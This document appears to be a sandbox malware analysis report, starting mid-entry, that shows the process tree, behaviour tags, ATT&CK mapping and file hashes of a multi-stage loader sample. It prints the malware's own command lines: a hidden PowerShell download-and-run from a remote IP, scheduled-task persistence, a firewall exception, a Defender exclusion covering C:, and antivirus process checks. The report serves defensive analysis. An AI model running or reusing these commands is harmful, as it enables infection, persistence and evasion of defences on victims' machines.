memory of 5720 3084 MSBuild.exe 109 PID 3084 wrote to memory of 5720 3084 MSBuild.exe 109 PID 3084 wrote to memory of 5720 3084 MSBuild.exe 109 PID 2184 wrote to memory of 1816 2184 cmd.exe 113 PID 2184 wrote to memory of 1816 2184 cmd.exe 113 PID 2184 wrote to memory of 1816 2184 cmd.exe 113 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 5956 wrote to memory of 3016 5956 1Hoz3Kt.exe 114 PID 3060 wrote to memory of 5836 3060 rapes.exe 118 PID 3060 wrote to memory of 5836 3060 rapes.exe 118 PID 3060 wrote to memory of 5836 3060 rapes.exe 118 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 PID 5836 wrote to memory of 5008 5836 6b0cf60590.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2964
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:2636
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:5724
-
-
C:\Windows\SysWOW64\fontdrvhost.exe"C:\Windows\System32\fontdrvhost.exe"2⤵
- System Location Discovery: System Language Discovery
PID:6676
-
-
C:\Users\Admin\AppData\Local\Temp\2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-31_0eccd198d1939a692bfbbca2e75a1436_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn JNtBRmaeHMD /tr "mshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2876 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn JNtBRmaeHMD /tr "mshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4244
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\2oMN1S9pZ.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Users\Admin\AppData\Local\TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE"C:\Users\Admin\AppData\Local\TempYYQWPKGCPTTCDTRQA1ZVHVUJKTPKNKPR.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"C:\Users\Admin\AppData\Local\Temp\10395570101\1Hoz3Kt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5956 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵PID:5840
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3016 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- System Location Discovery: System Language Discovery
PID:3020
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:2068 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2068 -s 4888⤵
- Program crash
PID:1404
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"C:\Users\Admin\AppData\Local\Temp\10395640101\ZzvSz9G.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Drops startup file
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "MSBuild" /tr "C:\Users\Admin\AppData\Roaming\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5720
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe"C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:5836 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10395660101\6b0cf60590.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5008
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe"C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3736 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10395670101\ef0c5b42b9.exe"7⤵
- Downloads MZ/PE file
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4900
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"C:\Users\Admin\AppData\Local\Temp\10395680101\ZzvSz9G.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3752
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"C:\Users\Admin\AppData\Local\Temp\10395690101\1Hoz3Kt.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1572 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"8⤵
- System Location Discovery: System Language Discovery
PID:5536
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:5508 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5508 -s 5008⤵
- Program crash
PID:6800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395700101\699c61c575.exe"C:\Users\Admin\AppData\Local\Temp\10395700101\699c61c575.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1W47k9.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5652
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2x9762.exe7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1028
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe"C:\Users\Admin\AppData\Local\Temp\10395710101\gLLOqKC.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5440 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4704
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe"C:\Users\Admin\AppData\Local\Temp\10395730101\nAM5wkr.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:1700 -
C:\Windows\SYSTEM32\CMD.exe"CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit7⤵PID:1400
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit7⤵PID:5080
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:5940
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit7⤵PID:2460
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST8⤵
- Scheduled Task/Job: Scheduled Task
PID:5884
-
-
-
C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3212
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10395740101\TbV75ZR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3400 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:4588
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- System Location Discovery: System Language Discovery
PID:4160 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 4968⤵
- Program crash
PID:4604
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe"C:\Users\Admin\AppData\Local\Temp\10395750101\z85yd_003.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
PID:4796 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4596
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Loads dropped DLL
- Adds Run key to start application
PID:1884 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5460
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
- Loads dropped DLL
PID:1524 -
C:\Users\Admin\AppData\Local\Temp\{70d6de0e-7607-4c5a-9fab-69928d000bb7}\ff6422e.exe"C:\Users\Admin\AppData\Local\Temp\{70d6de0e-7607-4c5a-9fab-69928d000bb7}\ff6422e.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:11416 -
C:\Users\Admin\AppData\Local\Temp\{39fe345b-9f35-40dc-b69c-2774bd405002}\bf02fd08.exeC:/Users/Admin/AppData/Local/Temp/{39fe345b-9f35-40dc-b69c-2774bd405002}/\bf02fd08.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:12232
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe"C:\Users\Admin\AppData\Local\Temp\10395760101\EPTwCQd.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5060 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:2828
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:4016
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395770101\SPOKz5U.exe"C:\Users\Admin\AppData\Local\Temp\10395770101\SPOKz5U.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1048 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:3424
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe"C:\Users\Admin\AppData\Local\Temp\10395790101\7IIl2eE.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:13180 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat7⤵
- System Location Discovery: System Language Discovery
PID:13264 -
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9740
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"8⤵
- System Location Discovery: System Language Discovery
PID:9776
-
-
C:\Windows\SysWOW64\tasklist.exetasklist8⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:9992
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"8⤵
- System Location Discovery: System Language Discovery
PID:2104
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 4183778⤵
- System Location Discovery: System Language Discovery
PID:10148
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab8⤵
- System Location Discovery: System Language Discovery
PID:10220
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation8⤵
- System Location Discovery: System Language Discovery
PID:10616
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com8⤵
- System Location Discovery: System Language Discovery
PID:10732
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N8⤵
- System Location Discovery: System Language Discovery
PID:10920
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:11048
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 58⤵
- System Location Discovery: System Language Discovery
PID:11280
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395800101\ba223baae3.exe"C:\Users\Admin\AppData\Local\Temp\10395800101\ba223baae3.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:8036 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
PID:5832
-
-
-
C:\Users\Admin\AppData\Local\Temp\10395810101\8e41b6c338.exe"C:\Users\Admin\AppData\Local\Temp\10395810101\8e41b6c338.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:12736
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2012
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\MSBuild.exe1⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Users\Admin\AppData\Roaming\MSBuild.exeC:\Users\Admin\AppData\Roaming\MSBuild.exe2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1632
-
C:\Users\Admin\AppData\Roaming\MSBuild.exeC:\Users\Admin\AppData\Roaming\MSBuild.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5844
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"1⤵PID:2572
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"2⤵PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2068 -ip 20681⤵PID:8
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4160 -ip 41601⤵PID:3432
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:4856
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\{A332F586-BC6E-46FF-BB3B-A67E49F41010}\aitstatic.exe {1CF6DD21-C538-4D1C-883F-AD3AF450FA11}1⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exeC:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6344
-
C:\Users\Admin\AppData\Roaming\MSBuild.exeC:\Users\Admin\AppData\Roaming\MSBuild.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6072
-
C:\Users\Admin\AppData\Roaming\xdwdkernel.exeC:\Users\Admin\AppData\Roaming\xdwdkernel.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:6724
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 5508 -ip 55081⤵PID:6740
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\{05dc54c8-45de-44db-a946-dd9c037a36d7}\124c888f-44a3-49e5-870d-3844554e28df.cmd"1⤵PID:3396
-
C:\Windows\system32\PING.EXEping 127.0.0.1 -n 12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:12472
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1AppInit DLLs
1Pre-OS Boot
1Bootkit
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Event Triggered Execution
1AppInit DLLs
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Impair Defenses
1Safe Mode Boot
1Modify Registry
2Pre-OS Boot
1Bootkit
1Virtualization/Sandbox Evasion
2Discovery
Process Discovery
1Query Registry
6Remote System Discovery
1System Information Discovery
4System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD584e77a587d94307c0ac1357eb4d3d46f
SHA183cc900f9401f43d181207d64c5adba7a85edc1e
SHA256e16024b092a026a9dc00df69d4b9bbcab7b2dc178dc5291fc308a1abc9304a99
SHA512aefb5c62200b3ed97718d20a89990954d4d8acdc0a6a73c5a420f1bba619cb79e70c2cd0a579b9f52dc6b09e1de2cea6cd6cac4376cfee92d94e2c01d310f691
-
Filesize
841B
MD50efd0cfcc86075d96e951890baf0fa87
SHA16e98c66d43aa3f01b2395048e754d69b7386b511
SHA256ff981780f37479af6a428dd121eef68cf6e0b471ae92f080893a55320cc993f7
SHA5124e79f5a8494aac94f98af8dbbc71bdd0a57b02103757ad970da7e7d4e6a0dc5015ca008256a6bd2c5bdec3a0f5736a994e17b3ef004b0f374a3339e480ac41b1
-
Filesize
1B
MD5cfcd208495d565ef66e7dff9f98764da
SHA1b6589fc6ab0dc82cf12099d1c2d40ab994e8410c
SHA2565feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9
SHA51231bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99
-
Filesize
3.0MB
MD52cb4cdd698f1cbc9268d2c6bcd592077
SHA186e68f04bc99f21c9d6e32930c3709b371946165
SHA256c89a0fea7c3850c8bf4b6a231a34cfb699c97783b1b2b1176070dd4d9cb4bd4a
SHA512606216ce50d2c89f4700fd3f8853b09f5626615cac64bfe304c15524a908b4a220abed1a023b0f099d390a2e5b14e1dc4f94840aa398658188ad299c93939de3
-
Filesize
16KB
MD52f3567b8307f0b55840aea5746fc7796
SHA14992638a91a2319794e94f7861226db863828a5d
SHA2564f1ae7538087e446698cae8bd3f30b6d07659329c8a5ee4ee79e74a7a89e2be6
SHA512107bd8e5983141fd4c7ea0a4a44de9b2ebee88471aeb01b5ee8879e2752cb33055994931d7a55831f7377fea20bfcf7fcb7eb730b87598b5cc166b862685999d
-
Filesize
1.8MB
MD56385881e5ff66c6855a2fbab086053a0
SHA1949879d9e31500e815de723702948a09bafd029e
SHA256a7a94eefe57a756a4daad27d5fc7ba94225f9d206017cd86d0f9e58949ca5982
SHA5124ef8abea83f69a71be676030a5cfbe69d27188f5f6ce6a9bec69037aa2ba00b45bbc50353db48386432416a4c91068578a74098ecfb502bea019a3989f5dd92b
-
Filesize
1.1MB
MD599786ffb15648a706671087549727e26
SHA1b7dfc116609a001651d03e1e273a79f82c902452
SHA256368baab68b40065e0fcfdde019a2fdd3fe3b385ca39cbb00622e71dc677122a2
SHA5129348a2697d27c02e01ddad6218b3b8644566de377a17ef86d7c96b28c7403e7f6c1db62c510e7f7ca1da52163d1648584de2c96d7c43e76832cc35a4e2ee52d3
-
Filesize
2.0MB
MD5e5f1ecadd319d48dc80f692e52e755a7
SHA16c3278a974ff2505ac3a824a7ace6aa021ace1a1
